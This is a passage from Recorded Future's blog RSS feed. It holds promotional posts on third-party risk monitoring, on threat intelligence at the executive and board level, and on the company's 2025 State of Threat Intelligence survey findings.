          <li><strong>Comprehensive Visibility:</strong> <a href="https://www.recordedfuture.com/threat-intelligence-101/risk-assessment-management/third-party-risk-monitoring">Continuous monitoring</a> provides an attacker’s-eye view of each vendor’s digital footprint, uncovering blind spots that traditional audits miss.</li>
        </ul>
        <h2>How Recorded Future’s Third-Party Intelligence Delivers Continuous, Contextual Insight</h2>
        <p>Recorded Future’s <a href="https://www.recordedfuture.com/products/third-party-intelligence">Third-Party Intelligence</a> exemplifies this modern approach. It delivers real-time risk scores and actionable alerts derived from the broadest range of data sources available, including dark web monitoring, technical telemetry, and validated threat intelligence. These insights integrate into existing risk management workflows, transforming static oversight into a living, adaptive defense.</p>
        <p><strong>Core capabilities include:</strong></p>
        <ul>
          <li><strong>Continuous Monitoring.</strong> Tracks over 5 million organizations and 1 million technology products for breaches, malicious traffic, ransomware extortion, and dark web chatter.</li>
          <li><strong>External Risk Scoring.</strong> Uses machine learning and NLP to analyze data from hundreds of thousands of open, dark web, and technical sources, generating dynamic Risk Scores that quantify vendor exposure.</li>
          <li><strong>Dark Web and Threat Intelligence.</strong> Identifies data leaks, compromised credentials, and chatter around vendor breaches before disclosure.</li>
          <li><strong>Comparative Vendor Assessment.</strong> Enables side-by-side comparison of vendors to prioritize procurement and onboarding decisions.</li>
          <li><strong>Stakeholder Reporting.</strong> Delivers comprehensive, context-rich risk profiles for leadership and board reporting.</li>
          <li><strong>API Integration.</strong> Connects with existing TPRM, GRC, and ticketing platforms, feeding risk data into established workflows.</li>
          <li><strong>Automated Mapping of Internal Entities and Subsidiaries.</strong> Assesses risk stemming from a supplier’s technical infrastructure, subsidiary relationships, and geographic footprint.</li>
          <li><strong>Custom Alerts.</strong> Allows teams to define criteria for alerts (e.g., vendor breach, new exposure) and focus only on the most relevant risks.</li>
        </ul>
        <p><strong>Customer outcomes include:</strong></p>
        <ul>
          <li>73% average increase in visibility into potential threats</li>
          <li>32% less time spent on evaluating new vendors or supplier</li>
          <li>35% more third parties assessed</li>
          <li>43% average increase in security team capacity</li>
        </ul>
        <div>
          <div>
            <div>
              <h2>Our time to detect third-party cyber breaches has decreased substantially. Previously, we were either notified directly by a third party or via a news outlet or regulatory reporting, which meant that it could take days or even weeks for us to be made aware. With Recorded Future, we've been able to identify third-party concerns within one to two days.</h2>
              <p>Senior Engineer</p>
              <p>Cybersecurity Incident Management, Insurance Company</p>
            </div>
            <div></div>
          </div>
        </div>
        <p>The evidence is clear: reactive oversight leaves organizations blind to threats already moving through their supply chains. A continuous, intelligence-driven approach changes that equation. By combining real-time visibility with actionable insights, security and risk teams can detect vendor threats early, respond faster, and reduce the financial and reputational fallout of supply chain attacks.</p>
        <p>Don’t wait for the next third-party breach to become another statistic. <a href="https://www.recordedfuture.com/products/third-party-intelligence?utm_source=chatgpt.com">Book a demo</a> to see how Recorded Future’s Third-Party Intelligence helps organizations stay ahead of rapidly evolving risks.</p>
        <div>
          <div>
            <div>
              <h2>FAQs</h2>
            </div>
          </div>
          <div>
            <div>
              <h3>What is considered a third-party risk?</h3>
              <p>A third-party risk is any potential threat to your organization's security, finances, or reputation posed by an external vendor, supplier, partner, or contractor who has access to your data, systems, or networks. This includes risks like data breaches, operational disruptions, and compliance violations originating from your supply chain.</p>
            </div>
          </div>
          <div>
            <div>
              <h3>What are the main types of third-party risk?</h3>
              <p>The main types include cybersecurity risk (data breaches, malware), operational risk (service disruptions), compliance risk (violating regulations like GDPR or CCPA), reputational risk (damage to your brand by association), and financial risk (revenue loss, regulatory fines).</p>
            </div>
          </div>
          <div>
            <div>
              <h3>How often should third-party risk assessments be conducted?</h3>
              <p>While traditional best practice was to conduct assessments annually, the current threat landscape demands a shift to continuous monitoring. Relying on annual, point-in-time assessments leaves significant security gaps where a vendor's risk posture can change without you knowing.</p>
            </div>
          </div>
          <div>
            <div>
              <h3>How does Recorded Future help with third-party risk assessment?</h3>
              <p>Recorded Future’s Third-Party Intelligence solution transforms risk assessment from a static, manual process into a dynamic, data-driven one. It provides continuous, real-time intelligence on your vendors' external security posture by monitoring millions of sources, including the dark web. This allows you to proactively identify threats, prioritize risks with objective scoring, and take action before a vulnerability impacts your organization.</p>
            </div>
          </div>
          <div>
            <div>
              <h3>What is the first step to improving a third-party risk management program?</h3>
              <p>The first step is to gain complete visibility into your entire vendor ecosystem. You cannot protect what you don't know you have. This involves identifying every third party and fourth party with access to your data or systems and then beginning the process of prioritizing them based on their level of access and criticality to your operations.</p>
            </div>
          </div>
        </div>
      ]]></content:encoded>
            <category>Blog</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/blog/media_1809f9481a6b24855bff52010115e19000c6f1e98.png?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[Threat Intelligence & the C-Suite]]></title>
            <link>https://www.recordedfuture.com/blog/ti-from-soc-to-c-suite</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/blog/ti-from-soc-to-c-suite</guid>
            <pubDate>Wed, 12 Nov 2025 00:00:00 GMT</pubDate>
            <description><![CDATA[Discover how threat intelligence has moved from the SOC to the boardroom. Learn why modern enterprises use it to drive strategic decisions, manage risk, and power governance across the business.]]></description>
            <content:encoded><![CDATA[
        <h2>From Defensive Maneuvering to Proactive Decision-Making</h2>
        <p>Threat intelligence is undergoing fundamental changes in both the breadth of its capabilities and its applications. We are seeing threat intelligence evolve from a tactical defensive tool—where teams are bringing in indicators of compromise and trying to make informed decisions around known risks—to a more proactive and strategic tool. Increasingly, enterprises are using threat intelligence to determine areas of investment, security tool purchasing, which supply chain or third party vendors to work with, and even how they train their employees.</p>
        <p>Rather than looking at threat intelligence as a kind of routine reporting reserved for security teams, organizations are beginning to see its value in broader business decisionmaking. Today, threat intelligence is being used across the enterprise, informing decisions from the board and executive levels all the way down to day-to-day security operations.</p>
        <p>With our 2025 State of Threat Intelligence report finding that 83% of organizations now run full-time threat intelligence teams, and most use intelligence to guide daily or weekly operations, it’s clear that what once began as a tactical advantage has now become a strategic necessity.</p>
        <h2>A Seat at the Boardroom Table: The Strategic Maturation of Threat Intelligence</h2>
        <p>These changes constitute a true paradigm shift in today’s enterprise security operations. In relatively short order, threat intelligence has evolved from just another security tool to an essential source of information for business strategy. So, what fueled this change?</p>
        <p>Threat intelligence was once the domain of analysts hunched over indicators and dashboards. But as cyber risk began shaping balance sheets and brand value, intelligence moved beyond the SOC. Today, it informs everything from vulnerability management and incident response to compliance, insurance, and executive protection. The same datasets that once helped detect intrusions now guide procurement choices, risk modeling, and crisis communication plans.<br /><br />As a result, we are seeing threat intelligence used by more than just security teams. It is now being used by governance, risk &amp; compliance (GRC) teams, fraud teams, physical security teams, marketing and communications teams, and perhaps most importantly, by executive leadership teams and board leadership.</p>
        <div></div>
        <div>
          <div>
            <div>
              <h2>Modern threat intelligence shifts the narrative from “are we secure?” to “how much risk can we tolerate?” We're never going to reach zero risk. But with threat intelligence, we can ensure that we're operating at an acceptable level, where we can keep under control those things that would cause business disruption, competitive disadvantage, financial implications or regulatory failures.</h2>
            </div>
            <div></div>
          </div>
        </div>
        <p>In our 2025 State of Threat Intelligence Report, Recorded Future found that nearly three-quarters (73%) of surveyed security professionals report using threat intelligence, along with 48% of Incident response teams, 47% of risk management teams, and 46% vulnerability management teams.</p>
        <p>This continued spread of threat intelligence across business functions signals a shift from threat intelligence as a tool for optimizing defensive posture to one for optimizing strategic integration and risk management.</p>
        <h2>The Board’s New Dashboard: Threat Intelligence as a Business Translator</h2>
        <p>As the board’s appetite for timely, relevant risk insight grows, threat intelligence provides a vital bridge between technical data and strategic clarity. Boards are increasingly demanding information and briefings that translate adversarial behavior into plain-language impacts, such as:</p>
        <ul>
          <li>Threat Intelligence-informed presentations shaping risk committee agendas</li>
          <li>Executive protection and brand monitoring as extensions of enterprise intelligence</li>
          <li>Threat Intelligence-driven prioritization of cybersecurity budgets and third-party vetting</li>
        </ul>
        <p>We can see these new applications play out in routine, yet vital, processes across the modern enterprise. Consider the following two scenarios and how they illustrate the ways in which threat intelligence is being used to determine executive and board-level decision-making:</p>
        <ul>
          <li><strong>High-risk, high-impact threats</strong> (like ransomware campaigns or geopolitical disruption) trigger strategic investment in contingency planning and data redundancy, and/or decisions around where to do business.</li>
          <li><strong>Persistent but lower-impact risks</strong> may inform tolerance thresholds or shape insurance coverage decisions.</li>
        </ul>
        <p>These examples demonstrate how intelligence enables boards to truly act on risk, not just acknowledge it. With these tools, organizations are now able to use threat intelligence to decide which businesses to work with, which technologies to bring on board, and whether or not the business can expand into new regions safely and effectively.</p>
        <div>
          <div>
            <div>
              <h2>Enterprises are increasing threat intelligence spend as security shifts from reactive defense to a holistic, intelligence-driven strategy. Modern intelligence helps detect attacks sooner, prioritize critical risks, and respond faster—strengthening vulnerability management, incident response, and board-level risk decisions. With ransomware, supply-chain attacks, and regulatory pressure on the rise, intelligence is now central to smarter, faster, and more effective enterprise-wide action.</h2>
              <p>2025 State of Threat Intelligence Report</p>
              <p>Recorded Future</p>
            </div>
            <div></div>
          </div>
        </div>
        <h2>Intelligence as the Backbone of Enterprise Agility: How Threat Intelligence Keeps Orgs On Their Toes</h2>
        <p>Whereas in the past, an organization might use threat intelligence to inform their security posture, today, threat intelligence is being used in a much more holistic way, directly powering overall enterprise adaptability, resilience, and governance outcomes.</p>
        <p>In today’s rapidly changing threat landscape—with the growth of advanced, AI-enabled threats, supply-chain attacks, and shifting global regulations—boards can no longer afford to rely on static risk models. And it is comprehensive, timely, and relevant threat intelligence that helps keep today’s models dynamic.</p>
        <p>The majority of organizations today use threat intelligence to guide business decisions related to purchasing, risk assessment, and resource allocation. In our 2025 State of Threat Intelligence Report, Recorded Future found that:</p>
        <ul>
          <li>Nearly two-thirds (65%) of surveyed security professionals say threat intelligence directly supports security technology purchasing decisions</li>
          <li>58% say it guides risk assessment for business initiatives</li>
          <li>53% say it supports incident response resource allocation</li>
        </ul>
        <p>With all of these figures representing year-over-year increases, it’s safe to say that the majority of organizations have already adopted this more holistic view of threat intelligence. And for those that haven’t, all signs seem to suggest that they soon will. At the very least, we can say that they certainly ought to.</p>
        <h2>Intelligence-Driven Governance Is Essential for Modern Risk Management</h2>
        <p>The widespread adoption of threat intelligence across operations (including board-level decision-making) marks a turning point in how organizations perceive risk and value intelligence. No longer confined to security operations, threat intelligence is now a cornerstone of enterprise governance—a means of continuously informing executive and board-level risk decisions with clarity and confidence.</p>
        <p>In both its capabilities and its applications, threat intelligence has evolved dramatically over recent years, maturing from a reactive tool to a foundation for informed risk decisionmaking across the enterprise. From the SOC team, to the C-suite, and all the way to the board, threat intelligence is being used to inform a wide range of critical business decisions. With this larger shift in security from a reactive defense to a holistic, intelligence-driven strategy engine, enterprises are expanding their understanding and use of threat intelligence and seeing meaningful benefits as a result.</p>
        <p>Want to learn more about the state of enterprise threat intelligence today? <a href="http://recordedfuture.com">Download our 2025 State of Threat Intelligence Report here</a>.</p>
        <p>Interested in making modern threat intelligence a part of your board’s operations? <a href="https://www.recordedfuture.com/get-started#book-demo">Book a customized demo</a> with Recorded Future today.</p>
      ]]></content:encoded>
            <category>Blog</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/blog/media_1675c04e910df4130163445af824111e54bac26e2.png?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[Introducing the 2025 State of Threat Intelligence Report: Threat Intelligence Shifts from Defense to Strategy]]></title>
            <link>https://www.recordedfuture.com/blog/introducing-the-2025-state-of-threat-intelligence-report</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/blog/introducing-the-2025-state-of-threat-intelligence-report</guid>
            <pubDate>Wed, 12 Nov 2025 00:00:00 GMT</pubDate>
            <description><![CDATA[Discover how 43% of security leaders now use threat intelligence for strategic planning. Explore key insights from the 2025 State of Threat Intelligence Report, including enterprise spending trends, maturity challenges, and future investment plans.]]></description>
            <content:encoded><![CDATA[
        <h3>Nearly half of security leaders now use threat intelligence to guide business investments, as organizations mature their programs and 91% plan to increase spending in 2026.</h3>
        <h2>Key points</h2>
        <ol>
          <li>The third annual State of Threat Intelligence Report reveals that nearly half of security decision-makers use threat intelligence for strategic planning and investment, making it one of the most common use cases for enterprise organizations.</li>
          <li>With data breaches growing, most enterprises allocate substantial cybersecurity budgets to threat intelligence—and they plan to increase their spending in 2026.</li>
          <li>While threat intelligence maturity has improved year over year, more than half of respondents consider their organizations to be less than advanced—and almost half cite poor integration as a major challenge.</li>
          <li>More than half of security professionals expect moderate to significant changes to their threat intelligence needs in the next 12 months, and 81% said they plan to consolidate threat intelligence vendors.</li>
        </ol>
        <h2>Discover enterprises’ threat intelligence use cases, challenges, and future plans</h2>
        <p>Threat intelligence is no longer a nice-to-have—it's mission-critical. With state-sponsored attacks, cybercrime, and AI-powered threats on the rise, organizations are doubling down on threat intelligence as their secret weapon for proactive defense.</p>
        <p><a href="https://pages.recordedfutureext.com/2025-State-of-Threat-Intelligence-Report.html">The 2025 State of Threat Intelligence</a> is Recorded Future’s third annual flagship research report designed to take the pulse of the cybersecurity industry. Incorporating data from 615 cybersecurity executives, managers, and practitioners, the report reveals enterprise organizations’ use cases, challenges, and future investment plans.</p>
        <p>By sharing what we’ve learned, we hope to help organizations make smarter decisions about their investments, vendor choices, and program maturity. And, it helps keep us grounded in the real challenges our customers face every day.</p>
        <p>Check out key themes and highlights, and then explore the report for full details.</p>
        <h2>Threat intelligence usage and adoption</h2>
        <p>The report reveals that, in 2025, enterprises increasingly trust and rely on threat intelligence to inform business-critical decisions. Not only do 43% use it to guide strategic investments and planning, but most also say it helps them make decisions related to purchasing, risk assessment, and resource allocation.</p>
        <p>Compared to 2024, a larger percentage of organizations now have full-time threat intelligence teams, and 89% pay at least one threat intelligence vendor. Find out about their top use cases, how frequently they use it, and the variety of teams across their organizations that actively consume the intelligence.</p>
        <h2>Threat intelligence spending and success metrics</h2>
        <p><a href="https://www.verizon.com/business/resources/reports/2025-dbir-data-breach-investigations-report.pdf">Data breaches involving a third party doubled from 2024 to 2025</a>, so no surprise that our survey found that most enterprise organizations allocate substantial cybersecurity budgets to threat intelligence. Seventy-six percent invest $250k or more per year in external threat intelligence products (excluding services), and 14% spend more than $1 million per year.</p>
        <p>When asked about how they measure the ROI of threat intelligence, most said their organizations focus on speed and efficiency gains. See how they rank success metrics, from improved threat detection and response times to reduction in the number of incidents to cost savings from prevented incidents.</p>
        <h2>Challenges with threat intelligence maturity</h2>
        <p>The survey found that threat intelligence maturity is improving year over year, with 49% of surveyed security professionals saying their maturity level is advanced. In other words, they have tools that combine outputs from multiple threat intelligence sources, a dedicated threat intelligence team, and <a href="https://www.recordedfuture.com/blog/why-manual-cyber-operations-can-create-dangerous-gaps">automated workflows</a> that integrate with most security activities including business risk assessment.</p>
        <p>As their organizations increase investment to grow their maturity, survey respondents told us they’re also experiencing challenges related to threat intelligence vendors. Almost half are frustrated by poor integration with their existing security tools, but issues ranging from vendor credibility and cost effectiveness also come into play. Explore the challenges your peers are facing on the journey to threat intelligence maturity.</p>
        <h2>Future plans to strengthen threat intelligence</h2>
        <p>Finally, we asked respondents to tell us how they plan to improve their threat intelligence maturity and outcomes. Ninety-one percent said they plan to invest more in threat intelligence in 2026, and more than half expect moderate to significant changes to their threat intelligence needs in the next 12 months.</p>
        <p>Given that 81% said they plan to consolidate threat intelligence vendors, they should prioritize vendors that support the most critical capabilities across a number of use cases. See the top five capabilities our respondents prioritize in their day-to-day work.</p>
        <h2>Find out where your organization stands in relation to your peers</h2>
        <p>The 2025 State of Threat Intelligence Report makes it clear: As threat intelligence delivers increasing strategic value, forward-thinking enterprises are boosting investment and evolving their use cases.</p>
        <p><a href="https://pages.recordedfutureext.com/2025-State-of-Threat-Intelligence-Report.html">Download the report</a> to discover ideas and information that can help your organization succeed on its own maturity journey.</p>
      ]]></content:encoded>
            <category>Blog</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/blog/media_1c9ad3d74e02dc4eb4b6e55581b20bdc7994c0ad9.png?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
    </channel>
</rss>